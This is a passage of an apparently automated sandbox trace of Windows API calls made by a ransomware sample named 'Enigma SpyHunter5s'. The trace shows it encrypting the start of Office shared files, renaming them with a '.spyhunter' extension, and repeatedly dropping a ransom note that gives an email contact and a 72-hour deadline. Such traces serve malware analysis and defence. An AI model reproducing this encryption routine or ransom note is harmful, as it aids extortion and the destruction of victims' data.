lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb0 [0178.334] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Portal\\1033\\PortalConnect.dll") returned 86 [0178.334] StrStrW (lpFirst="PortalConnect.dll", lpSrch=".txt") returned 0x0 [0178.334] GetProcessHeap () returned 0x2c0000 [0178.334] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0178.334] ReadFile (in: hFile=0xb0, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270e3dc, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x270e3dc*=0x2800, lpOverlapped=0x0) returned 1 [0178.335] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0178.336] WriteFile (in: hFile=0xb0, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x270e3dc, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x270e3dc*=0x2800, lpOverlapped=0x0) returned 1 [0178.336] GetProcessHeap () returned 0x2c0000 [0178.336] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0178.336] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0178.336] WriteFile (in: hFile=0xb0, lpBuffer=0x270e41c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270e3dc, lpOverlapped=0x0 | out: lpBuffer=0x270e41c*, lpNumberOfBytesWritten=0x270e3dc*=0x4, lpOverlapped=0x0) returned 1 [0178.337] WriteFile (in: hFile=0xb0, lpBuffer=0x31f2f0*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270e3dc, lpOverlapped=0x0 | out: lpBuffer=0x31f2f0*, lpNumberOfBytesWritten=0x270e3dc*=0x30, lpOverlapped=0x0) returned 1 [0178.337] CloseHandle (hObject=0xb0) returned 1 [0178.337] GetProcessHeap () returned 0x2c0000 [0178.337] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fb1c8 [0178.337] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Portal\\1033\\PortalConnect.dll.spyhunter") returned 96 [0178.337] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Portal\\1033\\PortalConnect.dll" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\portal\\1033\\portalconnect.dll"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Portal\\1033\\PortalConnect.dll.spyhunter" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\portal\\1033\\portalconnect.dll.spyhunter")) returned 1 [0178.339] GetProcessHeap () returned 0x2c0000 [0178.339] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb1c8 | out: hHeap=0x2c0000) returned 1 [0178.339] GetProcessHeap () returned 0x2c0000 [0178.339] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f2f0 | out: hHeap=0x2c0000) returned 1 [0178.339] GetProcessHeap () returned 0x2c0000 [0178.339] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e4b9a0 | out: hHeap=0x2c0000) returned 1 [0178.339] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\OFFICE14\\$HOWDECRYPT$.txt" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\office14\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb0 [0178.340] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0178.340] WriteFile (in: hFile=0xb0, lpBuffer=0x270e353*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x270e47c, lpOverlapped=0x0 | out: lpBuffer=0x270e353*, lpNumberOfBytesWritten=0x270e47c*=0x127, lpOverlapped=0x0) returned 1 [0178.341] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0178.341] WriteFile (in: hFile=0xb0, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x270e47c, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x270e47c*=0x2ac, lpOverlapped=0x0) returned 1 [0178.341] CloseHandle (hObject=0xb0) returned 1 [0178.342] GetProcessHeap () returned 0x2c0000 [0178.342] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e80b70 | out: hHeap=0x2c0000) returned 1 [0178.342] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270e418 | out: pbBuffer=0x270e418) returned 1 [0178.342] GetProcessHeap () returned 0x2c0000 [0178.342] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f2f0 [0178.342] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f2f0*, pdwDataLen=0x270e410*=0x20, dwBufLen=0x30 | out: pbData=0x31f2f0*, pdwDataLen=0x270e410*=0x30) returned 1 [0178.342] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\OFFICE14\\RICHED20.DLL" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\office14\\riched20.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb0 [0178.343] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\OFFICE14\\RICHED20.DLL") returned 78 [0178.343] StrStrW (lpFirst="RICHED20.DLL", lpSrch=".txt") returned 0x0 [0178.343] GetProcessHeap () returned 0x2c0000 [0178.343] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0178.343] ReadFile (in: hFile=0xb0, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270e3d4, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x270e3d4*=0x2800, lpOverlapped=0x0) returned 1 [0178.444] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0178.444] WriteFile (in: hFile=0xb0, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x270e3d4, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x270e3d4*=0x2800, lpOverlapped=0x0) returned 1 [0178.444] GetProcessHeap () returned 0x2c0000 [0178.444] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0178.444] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0178.444] WriteFile (in: hFile=0xb0, lpBuffer=0x270e414*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270e3d4, lpOverlapped=0x0 | out: lpBuffer=0x270e414*, lpNumberOfBytesWritten=0x270e3d4*=0x4, lpOverlapped=0x0) returned 1 [0178.510] WriteFile (in: hFile=0xb0, lpBuffer=0x31f2f0*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270e3d4, lpOverlapped=0x0 | out: lpBuffer=0x31f2f0*, lpNumberOfBytesWritten=0x270e3d4*=0x30, lpOverlapped=0x0) returned 1 [0178.511] CloseHandle (hObject=0xb0) returned 1 [0178.518] GetProcessHeap () returned 0x2c0000 [0178.518] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fb1c8 [0178.518] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\OFFICE14\\RICHED20.DLL.spyhunter") returned 88 [0178.518] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\OFFICE14\\RICHED20.DLL" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\office14\\riched20.dll"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\OFFICE14\\RICHED20.DLL.spyhunter" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\office14\\riched20.dll.spyhunter")) returned 1 [0178.519] GetProcessHeap () returned 0x2c0000 [0178.519] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb1c8 | out: hHeap=0x2c0000) returned 1 [0178.519] GetProcessHeap () returned 0x2c0000 [0178.519] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f2f0 | out: hHeap=0x2c0000) returned 1 [0178.519] GetProcessHeap () returned 0x2c0000 [0178.519] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ee9080 | out: hHeap=0x2c0000) returned 1 [0178.520] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\OFFICE14\\Cultures\\$HOWDECRYPT$.txt" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\office14\\cultures\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb0 [0178.520] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0178.520] WriteFile (in: hFile=0xb0, lpBuffer=0x270e34b*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x270e474, lpOverlapped=0x0 | out: lpBuffer=0x270e34b*, lpNumberOfBytesWritten=0x270e474*=0x127, lpOverlapped=0x0) returned 1 [0178.521] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0178.521] WriteFile (in: hFile=0xb0, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x270e474, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x270e474*=0x2ac, lpOverlapped=0x0) returned 1 [0178.522] CloseHandle (hObject=0xb0) returned 1 [0178.522] GetProcessHeap () returned 0x2c0000 [0178.522] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e5d5c0 | out: hHeap=0x2c0000) returned 1 [0178.522] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270e410 | out: pbBuffer=0x270e410) returned 1 [0178.522] GetProcessHeap () returned 0x2c0000 [0178.522] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f2f0 [0178.522] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f2f0*, pdwDataLen=0x270e408*=0x20, dwBufLen=0x30 | out: pbData=0x31f2f0*, pdwDataLen=0x270e408*=0x30) returned 1 [0178.522] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\OFFICE14\\Cultures\\OFFICE.ODF" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\office14\\cultures\\office.odf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb0 [0178.523] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\OFFICE14\\Cultures\\OFFICE.ODF") returned 85 [0178.523] StrStrW (lpFirst="OFFICE.ODF", lpSrch=".txt") returned 0x0 [0178.523] GetProcessHeap () returned 0x2c0000 [0178.523] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0178.523] ReadFile (in: hFile=0xb0, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270e3cc, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x270e3cc*=0x2800, lpOverlapped=0x0) returned 1 [0178.598] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0178.598] WriteFile (in: hFile=0xb0, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x270e3cc, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x270e3cc*=0x2800, lpOverlapped=0x0) returned 1 [0178.598] GetProcessHeap () returned 0x2c0000 [0178.598] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0178.598] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0178.598] WriteFile (in: hFile=0xb0, lpBuffer=0x270e40c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270e3cc, lpOverlapped=0x0 | out: lpBuffer=0x270e40c*, lpNumberOfBytesWritten=0x270e3cc*=0x4, lpOverlapped=0x0) returned 1 [0178.716] WriteFile (in: hFile=0xb0, lpBuffer=0x31f2f0*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270e3cc, lpOverlapped=0x0 | out: lpBuffer=0x31f2f0*, lpNumberOfBytesWritten=0x270e3cc*=0x30, lpOverlapped=0x0) returned 1 [0178.717] CloseHandle (hObject=0xb0) returned 1 [0178.729] GetProcessHeap () returned 0x2c0000 [0178.729] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fb1c8 [0178.729] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\OFFICE14\\Cultures\\OFFICE.ODF.spyhunter") returned 95 [0178.729] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\OFFICE14\\Cultures\\OFFICE.ODF" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\office14\\cultures\\office.odf"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\OFFICE14\\Cultures\\OFFICE.ODF.spyhunter" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\office14\\cultures\\office.odf.spyhunter")) returned 1 [0178.730] GetProcessHeap () returned 0x2c0000 [0178.730] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb1c8 | out: hHeap=0x2c0000) returned 1 [0178.731] GetProcessHeap () returned 0x2c0000 [0178.731] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f2f0 | out: hHeap=0x2c0000) returned 1 [0178.731] GetProcessHeap () returned 0x2c0000 [0178.731] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e4b8a8 | out: hHeap=0x2c0000) returned 1 [0178.731] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270e410 | out: pbBuffer=0x270e410) returned 1 [0178.731] GetProcessHeap () returned 0x2c0000 [0178.731] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f2f0 [0178.731] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f2f0*, pdwDataLen=0x270e408*=0x20, dwBufLen=0x30 | out: pbData=0x31f2f0*, pdwDataLen=0x270e408*=0x30) returned 1 [0178.731] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\OFFICE14\\1033\\MSOINTL.REST.IDX_DLL" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\office14\\1033\\msointl.rest.idx_dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb0 [0178.844] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\OFFICE14\\1033\\MSOINTL.REST.IDX_DLL") returned 91 [0178.844] StrStrW (lpFirst="MSOINTL.REST.IDX_DLL", lpSrch=".txt") returned 0x0 [0178.844] GetProcessHeap () returned 0x2c0000 [0178.844] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0178.844] ReadFile (in: hFile=0xb0, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270e3cc, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x270e3cc*=0x2800, lpOverlapped=0x0) returned 1 [0178.875] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0178.875] WriteFile (in: hFile=0xb0, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x270e3cc, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x270e3cc*=0x2800, lpOverlapped=0x0) returned 1 [0178.875] GetProcessHeap () returned 0x2c0000 [0178.875] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0178.875] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0178.875] WriteFile (in: hFile=0xb0, lpBuffer=0x270e40c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270e3cc, lpOverlapped=0x0 | out: lpBuffer=0x270e40c*, lpNumberOfBytesWritten=0x270e3cc*=0x4, lpOverlapped=0x0) returned 1 [0178.885] WriteFile (in: hFile=0xb0, lpBuffer=0x31f2f0*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270e3cc, lpOverlapped=0x0 | out: lpBuffer=0x31f2f0*, lpNumberOfBytesWritten=0x270e3cc*=0x30, lpOverlapped=0x0) returned 1 [0178.885] CloseHandle (hObject=0xb0) returned 1 [0178.886] GetProcessHeap () returned 0x2c0000 [0178.886] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fb1c8 [0178.886] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\OFFICE14\\1033\\MSOINTL.REST.IDX_DLL.spyhunter") returned 101 [0178.886] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\OFFICE14\\1033\\MSOINTL.REST.IDX_DLL" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\office14\\1033\\msointl.rest.idx_dll"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\OFFICE14\\1033\\MSOINTL.REST.IDX_DLL.spyhunter" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\office14\\1033\\msointl.rest.idx_dll.spyhunter")) returned 1 [0178.887] GetProcessHeap () returned 0x2c0000 [0178.887] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb1c8 | out: hHeap=0x2c0000) returned 1 [0178.887] GetProcessHeap () returned 0x2c0000 [0178.887] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f2f0 | out: hHeap=0x2c0000) returned 1 [0178.887] GetProcessHeap () returned 0x2c0000 [0178.887] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e5d4c0 | out: hHeap=0x2c0000) returned 1 [0178.887] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\MSInfo\\$HOWDECRYPT$.txt" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\msinfo\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb0 [0178.888] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0178.888] WriteFile (in: hFile=0xb0, lpBuffer=0x270e33f*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x270e468, lpOverlapped=0x0 | out: lpBuffer=0x270e33f*, lpNumberOfBytesWritten=0x270e468*=0x127, lpOverlapped=0x0) returned 1 [0178.889] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0178.889] WriteFile (in: hFile=0xb0, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x270e468, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x270e468*=0x2ac, lpOverlapped=0x0) returned 1 [0178.889] CloseHandle (hObject=0xb0) returned 1 [0178.889] GetProcessHeap () returned 0x2c0000 [0178.889] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e80990 | out: hHeap=0x2c0000) returned 1 [0178.889] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270e408 | out: pbBuffer=0x270e408) returned 1 [0178.889] GetProcessHeap () returned 0x2c0000 [0178.890] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f2f0 [0178.890] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f2f0*, pdwDataLen=0x270e400*=0x20, dwBufLen=0x30 | out: pbData=0x31f2f0*, pdwDataLen=0x270e400*=0x30) returned 1 [0178.890] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\MSInfo\\msinfo32.exe" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\msinfo\\msinfo32.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0178.890] GetProcessHeap () returned 0x2c0000 [0178.890] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f2f0 | out: hHeap=0x2c0000) returned 1 [0178.890] GetProcessHeap () returned 0x2c0000 [0178.890] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ee8b10 | out: hHeap=0x2c0000) returned 1 [0178.890] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\MSInfo\\en-US\\$HOWDECRYPT$.txt" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\msinfo\\en-us\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb0 [0178.892] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0178.892] WriteFile (in: hFile=0xb0, lpBuffer=0x270e337*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x270e460, lpOverlapped=0x0 | out: lpBuffer=0x270e337*, lpNumberOfBytesWritten=0x270e460*=0x127, lpOverlapped=0x0) returned 1 [0178.893] lstrlenA 